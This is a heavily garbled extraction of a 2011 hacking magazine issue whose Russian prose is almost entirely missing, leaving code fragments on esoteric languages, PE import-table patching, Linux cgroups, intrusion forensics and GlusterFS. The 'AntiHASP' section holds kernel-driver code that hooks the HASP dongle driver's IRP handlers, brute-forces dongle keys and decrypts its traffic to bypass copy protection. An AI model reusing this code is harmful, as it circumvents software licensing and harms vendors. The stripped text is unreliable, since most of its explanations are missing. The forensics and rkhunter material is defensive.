DO ,1 SUB #12 <- #16
DO ,1 SUB #13 <- #162
PLEASE READ OUT ,1
PLEASE GIVE UP

SHAKESPEARE
.
. ,
, /,
.
, Enter,
Exit. ,
.
:
[Enter Hamlet and Romeo]
Hamlet:
You lying stupid fatherless big smelly half-witted coward! You are as
stupid as the difference between a handsome rich brave
hero and thyself!
Speak your mind!

IDE brainfuck', "Brainfuck Developer"

104

,
, (, Whitespace)
. ,
. , ,

.

11 /154/ 2011

HQ9++

A B boq
(* A B *)
latlh
(* *)
cha'
(* *)
B "A" cher
(* A B *)

,
, ,
HQ9+.
, 4
, , , H, Q, 9 +.
, hello
world, , ,
. ,
. :
H Hello world.
Q .
9 99
.
+ , , ,
, .
HQ9++, HQ9+ ,
- , (David Morgan-mar). , ++,
. ,
.
, HQ9,
HQ9++ '-' . .
, ,
,
.

BEFUNG

UNLAMBDA

.
, .
-,
, .
befunge.
, ,
, . , , ,
brainfuck, ,
.
,
.

Unlambda ,
-,
. : s, k `
.
,
.
, . F (x,y),
, F(x) , .
, F(x) y ( , , ).
`, ,
.
. .
i ,
ix x.
, , ,
.
k ( ) .
s. . ```sxyz x z, y z,
.

URISC, SUBLEQ

VAR'AQ
, Star track (
Big Bang Theory. . ),
, , Varaq,
.
2000 .
, : , , .
PostScript, Lisp,
, ,
, .
, .

>v
^<
hello world:
hello world , -
Befunge-93
>
v
v ,,,,,"Hello"<
>48*,
v
v,,,,,,"World!"<
>25*,@

11 /154/ 2011

`r```````````.H.e.l.l.o. .w.o.r.l.di

105

(bepshatsky@gmail.com)

AntiHASP

HASP

.
HASP (Hardware Against Software Piracy),
Aladdin Knowledge Systems
Ltd.
.

, , HASP : . USB-, PCMCIA-, LTP-


PCI-.
, . ,

.
, -
. ,
USB- ,
.


, . hardlock.sys.
, ,
.
, \Device\
FNT0. , e
-
.
-
.
, , . ,
DRIVER_OBJECT .
. e
, .
, IRP-, . ,
, ,
! -

106

, ,
.
, .


, IRP-.
DRIVER_OBJECT. ,
IoGetDevicePointer,
. , :
NTSTATUS HookDevice(LPWSTR lpDevice)
UNICODE_STRING DeviceName;
PDEVICE_OBJECT DeviceObject;
PFILE_OBJECT FileObject;
RtlInitUnicodeString(&DeviceName, lpDevice);
IoGetDeviceObjectPointer(&DeviceName, 1u,
&FileObject, &DeviceObject);
DEVICE_OBJECT, -

11 /154/ 2011

AntiHASP

DRIVER_OBJECT.
:
NTSTATUS HookDevice(LPWSTR lpDevice)
gDriverObject = DeviceObject-> DriverObject;
gDeviceControl = gDriverObject-> MajorFunction[
IRP_MJ_DEVICE_CONTROL];
gDriverObject-> MajorFunction[IRP_MJ_DEVICE_CONTROL] =
HookDispatch;
gInternalDeviceControl = gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL];
gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL] = HookDispatch;
gDriverUnload = gDriverObject->DriverUnload;
gDriverObject->DriverUnload = HookUnload;
ObfDereferenceObject(FileObject);
ObfDereferenceObject,
. ,
.
e, , ,
IRP-:
void UnhookDevice(void)
gDriverObject-> MajorFunction[IRP_MJ_DEVICE_CONTROL] =
gDeviceControl;
gDriverObject-> MajorFunction[
IRP_MJ_INTERNAL_DEVICE_CONTROL] = gInternalDeviceControl;
gDriverObject->DriverUnload = gDriverUnload;
,
. . - , ,
- ,
HookUnload:
void HookUnload(PDRIVER_OBJECT DrvObj)
UnhookDevice();
gDriverUnload(DrvObj);

WDK .

DRIVER_
OBJECT, e
. ,
. e
gHookUnload.

IRP-,
. , ( \DosDevices\Hook)
CREATE, CLOSE, READ.
IoCreateDevice(DriverObject, 0, &usDeviceName,
FILE_DEVICE_NULL, 0, 0, &pDeviceObject);
IoCreateSymbolicLink(&usSymbolicDeviceName, &usDeviceName);
DriverObject->MajorFunction[IRP_MJ_CREATE] = DriverDispatch;
DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispatch;
DriverObject->MajorFunction[IRP_MJ_READ] = DriverDispatch;
DriverObject->DriverUnload = DriverUnload;
,
, CreateFile\ReadFile\CloseHandle.
,

. ,
. ,
. (, ,
) , , . .
,
. e, ,
-, .
HookDispatch
if (idlTail->IrpData.InputLength) {
idlTail->InputBuffer = ExAllocatePool(NonPagedPool,
idlTail->IrpData.InputLength);
RtlCopyMemory(idlTail->InputBuffer,
Irp->AssociatedIrp.SystemBuffer,
idlTail->IrpData.InputLength);
}

11 /154/ 2011

107


if (IoSL->MajorFunction == IRP_MJ_DEVICE_CONTROL)
Status = pHookedDriverDispatch[IRP_MJ_DEVICE_CONTROL](
DeviceObject, Irp);
if (idlTail->IrpData.OutputLength) {
idlTail->OutputBuffer = ExAllocatePool(NonPagedPool,
idlTail-> IrpData.OutputLength);
RtlCopyMemory(idlTail->OutputBuffer, lpBuffer,
idlTail->IrpData.OutputLength);
}
. , ,
.
:
; ,
:
DriverDispatch
Length = IoSL->Parameters.Read.Length;
if (Length == sizeof(IRP_DATA) && idlHead)
RtlCopyMemory(Irp->UserBuffer, &idlHead->IrpData, Length);
else
if (idlHead && Length == (idlHead-> IrpData.InputLength +
idlHead-> IrpData.OutputLength))
{
RtlCopyMemory(Irp->UserBuffer, idlHead-> InputBuffer,
idlHead->IrpData.InputLength);
RtlCopyMemory((PVOID)((ULONG)Irp->UserBuffer +
idlHead->IrpData.InputLength),
idlHead-> OutputBuffer, idlHead->IrpData.OutputLength);
}
else if (Length == 1 && idlHead)
{
if (idlHead->InputBuffer)
ExFreePool(idlHead->InputBuffer);
if (idlHead->OutputBuffer)
ExFreePool(idlHead->OutputBuffer);

108

idlTemp = idlHead->ldlNext;
ExFreePool(idlHead);
idlHead = idlTemp;
if (!idlTemp)
idlTail = NULL;
}
, ,
e .
, . , (9c402450, 9c4024a0) . ,
, , , ,
, .
:
;
.
. , ,
AES (Advanced Encryption Standard).
.
e
, ,
,
.
, , . :
unsigned short Key;
unsigned char RefKey[8], VerKey[8];
for (Key = 0; Key <= 0x7fff, Key++) {
if (!HL_LOGIN(Key, 1, RefKey, VerKey)) {
HL_LOGOUT();
Break;
}
}

11 /154/ 2011

AntiHASP

return Key;

for (int i = 0xBE; i < 0xFF; i++) {


*(WORD*)(Buffer + i) -= Seed;
Seed = (Seed >> 15) | (Seed << 1);
Seed += *(WORD*)(Buffer + i) ^ i;
}

(MODAD) : , , . ,
e . HL_LOGIN, HL_LOGOUT
HASP SDK , e
, :

*((WORD*)Buffer + 0xba) = Seed;


}

WORD HL_LOGIN(WORD ModAd, Word Access,


Byte *RefKey, Byt *VerKey);
WORD HL_LOGOUT(void);

, . HASP SDK,
, .
API , . Hasp
API,
.

}
, , . :
Decrypt()
void Decrypt(BYTE* Buffer)
{
WORD Seed = *((WORD*)Buffer + 0x5e);
WORD Ver = *((WORD*)Buffer + 0xba);
if (Ver) {
for (int i = 0xFE; i > 0xBD; i--) {
Seed -= *(WORD*)(Buffer + i) ^ i;
Seed = (Seed << 15) | (Seed >> 1);
*(WORD*)(Buffer + i) += Seed;
}

. . e
IRP-. .
,
. , , /
.
:
NTSTATUS HookDispatch():
PIO_STACK_LOCATION Stack =
Irp-> Tail.Overlay.CurrentStackLocation;
ULONG IoControlCode;
if (Stack->MajorFunction == 14) {
IoControlCode = Stack.DeviceIoControl.IoControlCode;
if (IoControlCode != 0x9c402458) {
Return gDeviceControl(DeviceObject, Irp);
} else {
Encrypt(Irp->AssociatedIrp.SystemBuffer);
Crypt(Irp->AssociatedIrp.SystemBuffer, Key, DumpMemory);
}
}
return STATUS_FAILED;
, ,
. :
?
, :
Encrypt()
void Encrypt(BYTE * Buffer)
{
WORD Seed = *((WORD*)Buffer + 0x5e);
WORD Ver = *((WORD*)Buffer + 0xba);
if (Ver) {
for (int i = 0; i < 0xB9; i++) {
*(WORD*)(Buffer + i) += Seed;
Seed = (Seed >> 15) | (Seed << 1);
Seed -= *(WORD*)(Buffer + i) ^ i;
}

for (int i = 0xB8; i >= 0; i--) {


Seed += *(WORD*)(Buffer + i) ^ i;
Seed = (Seed << 15) | (Seed >> 1);
*(WORD*)(Buffer + i) -= Seed;
}
*((WORD*)Buffer + 0xba) = Seed;
}
}
e ,
.
, . ,
, .
, .
, ,
DeviceIoControl, .
: USB-.

. , .
,
IRP-.
. ! z

Hardlock.sys
\Device\FNTO

DeviceControl
InternalDeviceControl

DriverUnload


Antihasp.sys
HookDispatch
HookUnload

11 /154/ 2011

109

deeonis (deeonis@gmail.com)

DLL

DLL

, ,
, Windows
EXE DLL. , ,
. ,
,
. dynamic-link library, ,
.
DLL kernel32.dll user32.dll, .
, ,
.
.

,

exe- ,
.

Windows


.

,



.
110

WWW

PortableExecutables (PE):
emanual.ru/download/www.eManual.
ru_1298.html;

:
rsdn.ru/article/baseserv/peloader.xml.

INFO
Hiew must
have ,
PE: hiew.ru;
PETools

: petools.
org.ru/petools.shtml.


- DLL, .
: . , . .
API-,
LoadLibrary GetProcAddress. ,
, .
.
PE- (
, exe)
DLL, .
,

11 /154/ 2011

DLL-

notepad.exe PETools

. ,
DLL .
Windows
:
, .
, DLL
,
. ,
PE- , .

PE-
Windows DOS Header.
e_magic 00h
5A4Dh (IMAGE_DOS_SIGNATURE) ,
, MZ. e_lfanew
IMAGE_DOS_HEADER PE . , ,
winnt.h IMAGE_NT_HEADERS.
DWORD Signature,
4550h , , PE. ,

MZ PE, ,
PE-.

// , PE-
else
// Oops!!!
}
.
IMAGE_OPTIONAL_HEADER,
IMAGE_NT_HEADERS. IMAGE_OPTIONAL_HEADER
IMAGE_DATA_DIRECTORY.
- .

IMAGE_DIRECTORY_ENTRY_IMPORT 1.
IMAGE_DATA_DIRECTORY :
IMAGE_DATA_DIRECTORY
typedef struct _IMAGE_DATA_DIRECTORY {
DWORD VirtualAddress;
DWORD Size;

PE-
BYTE *buff = new BYTE[file_size];
// PE- buff...
if ((PIMAGE_DOS_HEADER)buff)->e_magic == IMAGE_DOS_SIGNATURE)
{
PIMAGE_NT_HEADERS nth = (PIMAGE_NT_HEADERS)((DWORD)
((PIMAGE_DOS_HEADER)buff)->e_lfanew) + (DWORD)buff);
if (nth->Signature == IMAGE_NT_SIGNATURE)

11 /154/ 2011

Hiew

111

typedef struct _IMAGE_DOS_HEADER


{
WORD e_magic;
WORD e_cblp;
WORD e_cp;
WORD e_crlc;
WORD e_cparhdr;
WORD e_minalloc;
WORD e_maxalloc;
WORD e_ss;
WORD e_sp;
WORD e_csum;
WORD e_ip;
WORD e_cs;
WORD e_lfarlc;
WORD e_ovno;
WORD e_res[4];
WORD e_oemid;
WORD e_oeminfo;
WORD e_res2[10];
LONG e_lfanew;
} *PIMAGE_DOS_HEADER;

typedef struct _IMAGE_OPTIONAL_HEADER


{
WORD Magic;
BYTE MajorLinkerVersion;
BYTE MinorLinkerVersion;
DWORD SizeOfCode;
DWORD SizeOfInitializedData;
DWORD SizeOfUninitializedData;
DWORD AddressOfEntryPoint;
DWORD BaseOfCode;
DWORD BaseOfData;
DWORD ImageBase;
DWORD SectionAlignment;
DWORD FileAlignment;
WORD MajorOperatingSystemVersion;
WORD MinorOperatingSystemVersion;
WORD MajorImageVersion;
WORD MinorImageVersion;
WORD MajorSubsystemVersion;
WORD MinorSubsystemVersion;
DWORD Win32VersionValue;
DWORD SizeOfImage;
DWORD SizeOfHeaders;
DWORD CheckSum;
WORD Subsystem;
WORD DllCharacteristics;
DWORD SizeOfStackReserve;
DWORD SizeOfStackCommit;
DWORD SizeOfHeapReserve;
DWORD SizeOfHeapCommit;
DWORD LoaderFlags;
DWORD NumberOfRvaAndSizes;
IMAGE_DATA_DIRECTORY DataDirectory[16];
} IMAGE_OPTIONAL_HEADER;

typedef struct _IMAGE_NT_HEADERS


{
DWORD Signature;
IMAGE_FILE_HEADER FileHeader;
IMAGE_OPTIONAL_HEADER32 OptionalHeader;
} *PIMAGE_NT_HEADERS32;

typedef struct _IMAGE_IMPORT_DESCRIPTOR {


union {
DWORD
Characteristics;
DWORD
OriginalFirstThunk;
};
DWORD
TimeDateStamp;
DWORD
ForwarderChain;
DWORD
Name;
DWORD
FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;

typedef struct _IMAGE_IMPORT_BY_NAME {


WORD
Hint;
BYTE
Name[1];
// , ,
// ASCIZ-
} IMAGE_IMPORT_BY_NAME;

typedef struct _IMAGE_DATA_DIRECTORY


{
DWORD VirtualAddress;
DWORD Size;
} IMAGE_DATA_DIRECTORY;

typedef struct _IMAGE_THUNK_DATA {


union {
DWORD ForwarderString; // PBYTE
DWORD Function;
// PDWORD
DWORD Ordinal;
DWORD AddressOfData;
// PIMAGE_IMPORT_BY_NAME
} u1;
} IMAGE_THUNK_DATA;

} IMAGE_DATA_DIRECTORY,
*PIMAGE_DATA_DIRECTORY;
VirtualAddress RVA (relative virtual
address), ,
ImageBase. RVA 1000h, ImageBase
00400000h,
00401000h.
, . ,
,
PE-
.
(, -,
RAW offset). ,
PE- Import table, RVA RVA
PointerToRawData .
() PE
Header, NumberOfSections IMAGE_FILE_HEADER. , ,
.

// RVA
DWORD impRVA = nth->OptionalHeader.DataDirectory[
IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
//
PIMAGE_SECTION_HEADER inFileSec =
IMAGE_FIRST_SECTION(nth);
// ,
WORD impSecIndex = -1;
for (size_t i = 0; i < nos-1; i++)
{
if (impRVA >= inFileSec[i].VirtualAddress &&
impRVA < inFileSec[i+1].VirtualAddress)
{
impSecIndex = i;
break;
}
}
//
DWORD impRawOffset = inFileSec[impSecIndex].
PointerToRawData + impRVA;


RAW Offset Import Table
// buff PE-...
PIMAGE_NT_HEADERS nth = (PIMAGE_NT_HEADERS)((DWORD)
((PIMAGE_DOS_HEADER)buff)->e_lfanew) + (DWORD)buff);
// -
WORD nos = nth->FileHeader.NumberOfSections;

112

,
DLL.
Import Table. , , .
IMAGE_IMPORT_DESCRIPTOR.
IMAGE_IMPORT_
DESCRIPTOR. ,
.

11 /154/ 2011

DLL-

IMAGE_IMPORT_DESCRIPTOR
typedef struct _IMAGE_IMPORT_DESCRIPTOR {
union {
DWORD Characteristics;
DWORD OriginalFirstThunk;
};
DWORD TimeDateStamp;
DWORD ForwarderChain;
DWORD Name;
DWORD FirstThunk;
} IMAGE_IMPORT_DESCRIPTOR;
: Name, OriginalFirstThunk FirstThunk.
Name RVA DLL. (0x00),
. , kernel32.dll,

13, 2.
.
OriginalFirstThunk RVA IMAGE_THUNK_DATA,
.
IMAGE_THUNK_DATA , RVA IMAGE_IMPORT_BY_NAME.
Hint 2 ,
DLL,
,
.
FirstThunk OriginalFirstThunk,
RVA IMAGE_THUNK_DATA, OriginalFirstThunk,
PE-
. .
, , PE, DLL.

IMAGE_IMPORT_DESCRIPTOR.
IMAGE_IMPORT_DESCRIPTOR
// IMAGE_IMPORT_DESCRIPTOR

PIMAGE_IMPORT_DESCRIPTOR iid = (PIMAGE_IMPORT_DESCRIPTOR)


(impRawOffset + (DWORD)buff);
//
while (iid->Name != 0) iid++;
// IMAGE_IMPORT_DESCRIPTOR
fillIID(iid);
//
iid++;
ZeroMemory(iid, sizeof(IMAGE_IMPORT_DESCRIPTOR));
. -,
sizeof(IMAGE_IMPORT_
DESCRIPTOR). , ,
, OriginalFirstThunk. -, IMAGE_IMPORT_DESCRIPTOR,
OriginalFirstThunk FirstThunk,
RVA Name.
PE-, - .

(, IMAGE_IMPORT_DESCRIPTOR),
- . PE-
- , , .
OriginalFirstThunk FirstThunk,
DLL Name, IMAGE_IMPORT_

11 /154/ 2011

BY_NAME
.
DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT]
DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].
PE-
.
, ,
, .
RVA ,
,
.
, , .
,
,
. ,
. , ,
, PE-.

DLL

Windows ,
, DLL.
.
DllMain
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
::MessageBox(NULL, "",
" DLL", MB_OK);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
ul_reason_for_call ,
DllMain. , exe-, ul_reason_for_call DLL_PROCESS_ATTACH. ,
, ,
DLL.
DllMain,
. ,
DLL - . ,
DLL , .


, , .
, DLL ,
Windows.
( ,
, DllMain).
API . , , ,
- DLL .

PE-,
,
. z

113

UNIXOID

(execbit.ru)

LINUX

Linux

.
, ,
,
SELinux AppArmor.
?
,
30%
, 5% ,
128
-?
.

114

INFO

WARNING

nice
ionice
,

:
nice -n 19 ionice -c2
-n7 .

cpulimit

,


,
200%.

. ,
( Adobe).
,
10%
. ,
, ,
- .
wget -,
- . -
, .
,
cgroups, Linux.


, .
, -20
19.
, ,
() .
, , mencoder
:
$ nice -n 19 mencoder -ovc lavc -lavcopts \
vcodec=mpeg in-video.avi -o out-video.avi
. mencoder
,
. , ,
,
.
, (, ), (,
, ,
).
, cpulimit.
cpulimit ,
,
(
SIGSTOP).

11 /154/ 2011

SIGCONT,
.
cpulimit Linux, FreeBSD POSIX .
: sudo apt-get install cpulimit. cpulimit, : cpulimit --exe --limit _
. :
cpulimit --pid 2960 --limit 55.
. cpulimit . abcuser ubuntuforums.
org ,

, . ,
(cpulimit_daemon.sh). /usr/local/bin :
# vi /usr/local/bin/cpulimit_daemon.sh
#
CPU_LIMIT=20
#
DAEMON_INTERVAL=3
#
# ,
BLACK_PROCESSES_LIST=npviewer.bin
#
WHITE_PROCESSES_LIST=

/mnt/cgroups


npviewer.bin, ( Flash- Adobe, ). .
:
$ sudo chmod 700 /usr/bin/cpulimit_daemon.sh
cpulimit, /etc/
init.d :
$ sudo chown root:root /etc/init.d/cpulimit
$ sudo chmod 755 /etc/init.d/cpulimit
:
$ sudo /etc/init.d/cpulimit start
$ sudo update-rc.d cpulimit defaults

.


.
POSIX-
ulimit, ,
( setrlimit).
,
, , :
$ ulimit -m
unlimited
,
. ,
100 (100 * 1024 = 100 ):
$ ulimit -m $((100*1024))

11 /154/ 2011

cgroups

: ,
( ),
,
. ,

. , :
#!/bin/sh
ulimit -m $1
$2
~/bin/mlimit
, : mlimit $((50*1024))
xterm.
softlimit
(goo.gl/Qrc7k).

115

UNIXOID
$ sudo ionice -c2 -n7 transmission


200 ,

- -.
ionice. , Idle 1234:

/etc/rc.local :

$ sudo ionice -c3 -p 1234

mount -t cgroup cgroup /sys/fs/cgroup/cpu -o cpu


mkdir -m 0777 /sys/fs/cgroup/cpu/user

,
. ,
.

. ,
.
,
. ,
transmission 100 , :
1. (
quota_100gb):

:
$ sudo sh /etc/rc.local
~/.config/autostart/cgroup.sh
:
mkdir -m 0700 /sys/fs/cgroup/cpu/user/$$
echo $$ > /sys/fs/cgroup/cpu/user/$$/tasks
.

$ sudo adduser quota_100gb


. ,
: )
-, ,
; ) ,
, ,
.
ionice. io, , -,
. ionice
:
1. Idle. , -, ,
, .
, , ,
.
0.
2. Best effort. ,
. -
,
, 0 7 (0
, 7 ). , nice, ,
nice -n 19 bla-bla-bla,
.
3. Real time. ,
.
(0-7) ,
-. , .
: 1 real
time, 2 best-effort, 3 idle. -,
ionice,
. :

116

, -

cgroups Fedora

11 /154/ 2011

, npviewer.bin Flash-

. .
2. 100 :

, trickle-.
, :
$ trickled -d 128 -u 128

$ sudo apt-get install quota


$ su
# init 1
/etc/fstab, ,
/home, usrquota:
/dev/sda7 /home ext4 defaults,usrquota 0 1
/home
:
# mount -o remount /home
# quotacheck -cugm /home
, quota_100gb:
# EDITOR=_ edquota -u quota_100gb
,
/etc/fstab. hard ,
, ( 100 ): echo
$((100*1024*1024)).
, :
# init 5
# exit
3. :

:
$ trickle wget ftp://kernel.org/bla-bla-bla
$ trickle transmission
$ trickle chromium
128 /.

, , , . Linux,
- , cgroups.
Control Groups Linux-, ,

.
,
- .
cgroups , ,
cgconfig, /etc/cgconfig.conf , cgcreate, ,
cgexec,
.
cgroup-bin, .
cgroup
, /
mnt/cgroups:

$ sudo -u quota_100gb transmission


trickle, ,
cpulimit,
(
socket).
,
:
$ sudo apt-get install trickle
:
$ trickle -d 128 -u 128 \
wget ftp://kernel.org/bla-bla-bla
'-d' , '-u'
( ).
-

11 /154/ 2011

$ sudo mkdir /mnt/cgroups


$ sudo mount -t cgroup none /mnt/cgroups

,
. :
cgroups
blkio -;
cpu ;
cpuacct ;
cpuset ;
;
devices ;
freezer ;
memory ;
net_cls
(classid)

Traffic Control (tc);

117

UNIXOID
ns .
: blkio, cpu memory.
net_cls , -
tc, ,
trickle.
, , /etc/
cgcondig.conf :
$ sudo vi /etc/cgconfig.conf
mount {
cpu = /mnt/cgroups/cpu;
memory = /mnt/cgroups/memory;
blkio = /mnt/cgroups/blkio;
}

transmission, :
$ cgexec -g blkio:me/transmission transmission
Flash-,
:
$ cgcreate -g cpu,memory:me/npviewer
100 10% ( 1
1024) :
$ echo 100 > /mnt/cgroups/cpu/me/npviewer/cpu.shares
$ echo 100M > \
/mnt/cgroups/memory/me/npviewer/memory.limit_in_bytes
:

cgconfig:
$ sudo /etc/init.d/cgconfig
, /mnt/cgroups/cpu, /mnt/cgroups/memory
/mnt/cgroups/blkio , .
,
root.
cgcreate:
$ sudo cgcreate -a $USER -g cpu,memory,blkio:me
me cpu, memory
blkio, .
,
. , ,
transmission, :
$ cgcreate -g blkio:me/transmission
( ) -
( 100 1000):
$ echo 100 > /mnt/cgroups/blkio/me/transmission/bklio.weight

$ cgclassify -g memory,cpu:me/npviewer \
`pidof npviewer.bin`
,
/etc/cgconfig.config:
# vi /etc/cgconfig.conf
#
group me {
perm {
# ?
admin {
uid = UID_
}
# ?
task {
uid = UID_
}
}
# ?
cpu { }
memory { }
blkio { }
}
group me/npviewer {
cpu {
cpu.shares = 100;
}
memory {
memory.limit_in_bytes = 100M;
}
}
group me/transmission {
blkio {
blkio.weight = 100;
}
}
, .

,
. , ,
wget.
. z
ulimit

118

11 /154/ 2011

UNIXOID

(execbit.ru)


HOW TO ,


. -
: ,
,
.
,
, .
,


,
, ?

?

11 /154/ 2011

INFO


btrfs
,

ext4,

WARNING
root SSH

FTP

*nix-.


, ,
( , , ), - ,
. ,
, iptraf/gkrellm
, - IP, 33477 SSH.
,
, . , . ?
(
, WiFi). , ,
ifconfig eth0 down, ,
. ,

. -,
, -, , ,
.
. , -

119

UNIXOID

, , , (
), , ,
:

/var/log/auth.log SSH

#
#
#
#
#
#
#

D=/media/usbflash
busybox ps > $D/ps.txt
busybox netstat -tuw > $D/conn.txt
busybox netstat -tuwl | grep LISTEN > $D/listen.txt
busybox who > $D/users.txt
busybox lsmod > $D/modules.txt
busybox mount > $D/mount.txt

,
. ps.txt
.
, .
- -
,
nc telnet.
, ,
cups,
. ,
( root),
:
# busybox find / -user

Linux-

: ls
, , ps , lsmod . , , .
busybox,
( , ,
), :
# dpkg -i busybox-*
:
# wget http://goo.gl/TuWTE
# tar -xjf busybox-1.19.1.tar.bz2
# cd busybox-1.19.1
# make menuconfig
//
# make
# make install
busybox
/bin/busybox (
, ,
). busybox , 100%: ,
wget, cp, ,
. .

120


. ,
,
, ,
. ,
.
conn.txt .
IP-
. ,
, , . ,
,
IP- ??. listen.txt
. , , , (,
80, web- ).
users.txt .
: ,
.
modules.txt , , , , .
mount.txt ,
, .
,
- LiveCD
( ,
reboot , / ).

?
LiveCD :
1. (
mount.txt):
# e2fsck /dev/sda{1,2,3,4}

11 /154/ 2011

SSHERIFF

/etc/passwd (, /mnt/etc/passwd)
UID:
# busybox cat /etc/passwd | grep '.*:.*:0:'

root- :
# vi /etc/ssh/sshd_config
PermitRootLogin no
Match Host 192.168.1.*,127.0.0.1
PermitRootLogin yes

2. /mnt (
mount.txt):
# mount /dev/sdaX /mnt

, , .
( )
. , ,
, ~/.ssh/authorized_keys
- .
( , , ).

:
1. UID- , find:

3. mount.txt.

# busybox find / \( -perm -02000 -o -perm -04000 \)

4. /mnt/bin busybox LiveCD (, , ):


# cp /bin/busybox /mnt/bin/busybox

2.

5. /mnt
chroot:
# chroot /mnt /bin/bash
3.
, busybox . , - .
? -, /root,
, /tmp, /var/tmp /dev/shm .
,
'c' .
, , , , .
, , ______,
.
.bash_history
, ,
, (
, ).

4.

5.

, , SUID-,
. , chroot-,
LiveCD .
xinetd,
.
/etc/xinetd.d, /etc/inetd.
conf. ,
. ,
.
PAM. , .
/etc/pam.d,
,
. Google
. ,
.

cron. , , ,
2 . 99%
, , netstat
nmap, .
/etc/cron.*, /var/spool/cron/crontabs,
.
CGI-. , , web- .
,
, .
, web-, ( , ,
, root).

, ,
.



.
, :
-

11 /154/ 2011

# chattr -iacsuASDd {/,/usr,/usr/local}{/bin/,/sbin/}*

121

UNIXOID
vsftpd , ,
. 99%
, .
. rkhunter ,
,
, ,

.
, (
LiveCD, ):
# apt-get install rkhunter
:
# /usr/bin/rkhunter -update
# /usr/bin/rkhunter -check
, ,
/bin ,
. rkhunter
, .
, rkhunter .

, , rkhunter , .
. , , ,
. ,
Fedora/RHEL, :
# rpm -Va
Debian/Ubuntu .
debsums:
# sudo apt-get install debsums
:
# /usr/bin/debsums -ca
, , , .

lastlog last

lastlog , IP

subsystem request for sftp by user root


reverse mapping checking getaddrinfo for X.X.X.X
[X.X.X.X] failed POSSIBLE BREAK-IN ATTEMPT!
99 ,
, ,
:
Failed password for root from X.X.X.X port 3473 ssh2
IP-
, ,
, ,
SSH.
lastlog,
IP. :

?
, .
.
,
. ?

: apache, vsftpd, samba ..
,
SSH, .
SSH- () /var/log/
auth.log (, PAM). SSH,
, .
:
Accepted password for root from X.X.X.X port 63241 ssh2
pam_unix_session(sshd:session): session opened for user
root by (uid=0)

122

root pts/3 X.X.X.X Thu Jul 21 21:39:41 +0600 2011


last.
, IP- , whois, -.

( )
:).
,
, , (

-).
, ,
, , (/var/
log/auditd.log).

11 /154/ 2011

USER_PROCESS

SYS_CALL_TABLE

SYS_LIB

syscall1

c0120020

syscall2

c0120031

syscall3

c0120042

...

text segment

...

KERNEL

...

, ,

?
, , ,
. ,
, ?
: .
,
, ,
- , .
.
-
, .
.
, , Debian/Ubuntu
:
# dpkg-reconfigure -phigh -a
, ,
. ,

evil_func3()

alter_syscall2

evil_func2()

alter_syscall1

evil_func1()

data segment

USER MODE

alter_syscall3

KERNEL MODE

ARDWARE
ARDWARE

, . -
: -,
, -, (
, ).
, . , ,
cruft-remover ( Debian/Ubuntu):
# apt-get install cruft
// ,
# cruft-remover --no-act find
//
# cruft-remover cleanup --all
rkhunter
:
# rkhunter --propupd
rkhunter cron-,
. , /etc/rkhunter.conf :
MAIL-ON-WARNING="root"

,
. , :
1. .
2. SSH.
3. .

rkhunter

11 /154/ 2011


. z

123

SYN/ACK

(execbit.ru)



GLUSTERFS


,

lustre,


.
lustre
.

GlusterFS.
124

WWW

:
http://bit.ly/nV9no8

usterFS .

, ,
.
lustre ceph, ,
, , ,
. GlusterFS
, , ,
FUSE (Linux, FreeBSD, NetBSD, MacOS X).
, :
, 0(1) ( ).
TCP/IP Infiniband RDMA
TCP/IP.
.
.
, .
: -, MySQL,
LDAP.

11 /154/ 2011

trace
-.
io-stats -.


server client,
.
GlusterFS (http://europe.gluster.org/community/
documentation/index.php/Translators). CloudFS/HekaFS
(http://cloudfs.org).

Glusterfs

GlusterFS
FUSE. ,
Linux-
,
. , Ubuntu
:
1. , GlusterFS- :
$ sudo apt-get install openssh-server wget nfs-common

BerkeleyDB .
Read-Ahead ( ) WriteBehind ( ) .
.
.
,
.
.
NFS-, GlusterFS.


GlusterFS, ,
, GlusterFS GNU/Hard ( GEOM
FreeBSD).
, . ,
, . ,
,
.
, .
:
posix UNIX,
( ).
replicate .
readahead .
writebehind
.
io-threads /.
io-cache .
stat-prefetch ( ,
).
quota
.
trash .

11 /154/ 2011

2. GlusterFS ( , ):
$ wget http://download.gluster.com/pub/gluster/
glusterfs/LATEST/Ubuntu/glusterfs_3.2.2-1_amd64.deb
$ sudo dpkg -i glusterfs*.deb
3. , . GlusterFS 24007, 24008,
brick
( ), , (
, GlusterFS

). NFS , 111. ,
iptables:
$ iptables -A INPUT -m state --state NEW -m tcp -p tcp \
--dport 24007:24047 -j ACCEPT
$ iptables -A INPUT -m state --state NEW -m tcp -p tcp \
--dport 111 -j ACCEPT
$ iptables -A INPUT -m state --state NEW -m udp -p udp \
--dport 111 -j ACCEPT
$ service iptables save
$ service iptables restart
GlusterFS-.
- . , x86_64,
8 1
.
10-
ethernet-, InfiniBand (OFED 1.5 ). RHEL 5.1,
Ubuntu Fedora, FUSE.
,
Ext4, Ext3, XFS.
, ,
POSIX- .

125

SYN/ACK

GlusterFS


, GlusterFS , .
. , ,

.
gluster peer probe IP. , () root
. :
$ ssh root@192.168.0.1
# gluster peer probe 192.168.0.2
Probe successful
192.168.0.1 192.168.0.2 ,
,
.
,
, /
.
( ):
# gluster peer probe 192.168.0.3
# gluster peer probe 192.168.0.4
,
( ):
# mkdir /data
gluster peer status :
# gluster peer status
Number of Peers: 3
Hostname: 192.168.0.2
Uuid: 5e987bda-16dd-43c2-835b-08b7d55e94e5

126

State: Peer in Cluster (Connected)


Hostname: 192.168.0.3
Uuid: 1e0ca3aa-9ef7-4f66-8f15-cbc348f29ff7
State: Pfde43e-4533-4e33-4f77-ed3984da21ae
State: Peer in Cluster (Connected)
Hostname: 192.168.0.4
Uuid: 3e0cabaa-9df7-4f66-8e5d-cbc348f29ff7
State: Pfde43e-4533-4e33-4f77-ed3984da21ae
State: Peer in Cluster (Connected)
,
, , . GlusterFS (3.2.1)
3 ,
:
Distributed , ,
.. ,
,
,
, , RAID-1
.
. ,
:
# gluster volume create new_volume transport tcp
